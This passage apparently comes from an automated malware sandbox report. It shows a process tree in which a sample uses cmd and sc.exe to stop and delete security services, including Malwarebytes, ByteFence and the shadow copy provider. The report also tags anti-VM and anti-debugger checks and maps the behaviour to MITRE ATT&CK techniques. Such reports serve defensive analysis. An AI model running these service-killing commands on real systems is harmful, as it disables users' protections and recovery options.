C:\Windows\system32\cmd.exe /c sc delete swprv
4⤵
PID:5340

C:\Windows\system32\sc.exe
sc delete swprv
5⤵
- Launches sc.exe
PID:6332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
4⤵
PID:5468

C:\Windows\system32\sc.exe
sc stop mbamservice
5⤵
- Launches sc.exe
PID:5792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
4⤵
PID:1760

C:\Windows\system32\sc.exe
sc stop bytefenceservice
5⤵
- Launches sc.exe
PID:6756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
4⤵
PID:948

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:1648

C:\Windows\system32\sc.exe
sc delete bytefenceservice
5⤵
- Launches sc.exe
PID:6196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
4⤵
PID:5688

C:\Windows\system32\sc.exe
sc delete mbamservice
5⤵
- Launches sc.exe
PID:6984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
4⤵
PID:7116

C:\Windows\system32\sc.exe
sc delete crmsvc
5⤵
- Launches sc.exe
PID:5180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat
4⤵
PID:7088

C:\Windows\system32\timeout.exe
timeout 5
5⤵
- Delays execution with timeout.exe
PID:564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:6560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5372

C:\Windows\SysWOW64\unsecapp.exe
C:\Windows\SysWOW64\unsecapp.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7040

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6664

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Virtualization/Sandbox Evasion

T1497

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery